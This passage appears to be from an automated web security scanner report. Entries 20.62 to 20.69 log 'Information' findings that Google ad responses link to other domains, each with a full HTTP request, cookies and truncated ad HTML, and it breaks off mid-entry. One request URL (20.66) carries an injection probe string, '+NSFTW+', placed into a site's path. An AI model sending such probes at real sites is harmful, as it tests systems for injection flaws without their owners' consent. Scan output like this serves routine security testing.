P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:15:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12698
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/sql-injection-second-order-www.insideup.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.Confio.com/SQL-Server-Query%26adT%3DSQL%2BServer%2BQuery%2BTool%26adU%3DCIOupdate.com%26adT%3DApplication%2BSecurity%2BInfo%26gl%3DUS&amp;usg=AFQjCNF0rnvIzbv1FuUMC02F_XySeBuoZQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.62. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301121453&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301103452685&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301103453399&frm=0&adk=1607234649&ga_vid=1343323401.1301103453&ga_sid=1301103453&ga_hid=711764533&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&fu=0&ifi=1&dtd=784&xpc=rBCdVakUdd&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 01:36:45 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12493
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.soundingsonline.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Cadillac.com/CTS%26adT%3DE350%2Bvs%2BCadillac%2BCTS%26adU%3Dwww.AmsterdamPrinting.com%26adT%3DAmsterdam%2BPrinting%2BSale%26adU%3Dwww.Gresen.Valve.Hydr.Benlee.com%26adT%3DGresen%2BHydraulics,%2BValves%26gl%3DUS&amp;usg=AFQjCNHAXDiB080YFTOpXBNqEjM3YurVFA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.63. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163399&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145452225&bpp=11&shv=r20110315&jsv=r20110321-2&correlator=1301145452263&frm=0&adk=1819763764&ga_vid=625868391.1301145452&ga_sid=1301145452&ga_hid=739386355&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&eid=33895132&fu=0&ifi=1&dtd=82&xpc=Ip6Inec1M4&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 13:16:44 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12216
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/acunetix/1and1-acu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Top10HostingList.com%26adT%3DBest%2B10%2BWeb%2BHosting%2BSites%26adU%3Dwww.Google.com/AdWords%26adT%3DFree%2BOnline%2BAdvertising%26adU%3DBrightcove.com%26adT%3DHost%2BVideos%2BOnline%26gl%3DUS&amp;usg=AFQjCNE5WWBC1DkuAy0x-Beb926X8egxVg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.64. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301550811&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fblind-sql-injection-netsparker-cwe89-capec-66.trk.vindicosuite.com.htm&dt=1301532811214&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301532811327&frm=0&adk=1607234649&ga_vid=1813628091.1301532811&ga_sid=1301532811&ga_hid=1252695308&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1001&bih=917&eid=33895132&fu=0&ifi=1&dtd=164&xpc=GJjRkgDNT5&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 31 Mar 2011 00:52:51 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4714
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k">
...[SNIP]...
oA5UD9QMAAADE%26num%3D1%26sig%3DAGiWqtxPkh92qEMtreMXv_tWvMHl6Dm0ZA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMLb0buepoe7mwEQ2AUYWjIIXfZ5xPdgr0k" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkBdxY9CTTcvDAsn-lQeljsmHDtbuheEBnru7zhGWk9-WSdDiiwEQARgBIL7O5Q04AFCN29fFBGDJBqAB7vLJ-QO6AQk3Mjh4OTBfYXPIAQTaAWlmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9uZXRzcGFya2VyL2JsaW5kLXNxbC1pbmplY3Rpb24tbmV0c3Bhcmtlci1jd2U4OS1jYXBlYy02Ni50cmsudmluZGljb3N1aXRlLmNvbS5odG2AAgG4AhjAAgXIAv7skxSoAwHoA5UD9QMAAADE%26num%3D1%26sig%3DAGiWqtxPkh92qEMtreMXv_tWvMHl6Dm0ZA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/sbo%253Fcid%253Dsoc_gg_lalb__sbo%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/blind-sql-injection-netsparker-cwe89-capec-66.trk.vindicosuite.com.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNH23hMjCqisj8K20q9bhcXcAR3Vyg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.65. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 13:13:36 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 2791
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googlead
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/acunetix/1and1-acu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.networksolutions.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHCCb6LDP-97u1OF2ng2LINBsekJA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.66. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121423&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&dt=1301103472597&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103473670&frm=0&adk=3965760877&ga_vid=444046128.1301103474&ga_sid=1301103474&ga_hid=1149958600&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=1077&xpc=hYA46mUL3p&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 01:37:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 1612
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe frameborder='0' marginwidth='0' marginheight='0' scrolling='no' width='728' height='90' src='http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D'></iframe>
...[SNIP]...
20.67. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301550560&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.nutter.com_80.htm&dt=1301532560678&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301532560791&frm=0&adk=1607234649&ga_vid=1907507471.1301532561&ga_sid=1301532561&ga_hid=892054392&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1001&bih=917&fu=0&ifi=1&dtd=304&xpc=fSu4YjYuBf&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 31 Mar 2011 00:48:40 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4243
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/netsparker/www.nutter.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE77alMnypYPTdN5W6Adbrj4NGxbQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.68. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301330084&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fhttp-injection%2Fhttp-header-injection-example-poc-report.usadmm.dotomi.com.html&dt=1301312084533&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301312084615&frm=0&adk=1607234649&ga_vid=956645245.1301312085&ga_sid=1301312085&ga_hid=968237326&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=148&xpc=wxY4UOeZAj&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 28 Mar 2011 11:34:00 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 2994
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googlead
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/dork/http-injection/http-header-injection-example-poc-report.usadmm.dotomi.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.networksolutions.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEq5gEX0RgphP8Ji5UMI49kNvYt4w" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
20.69. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

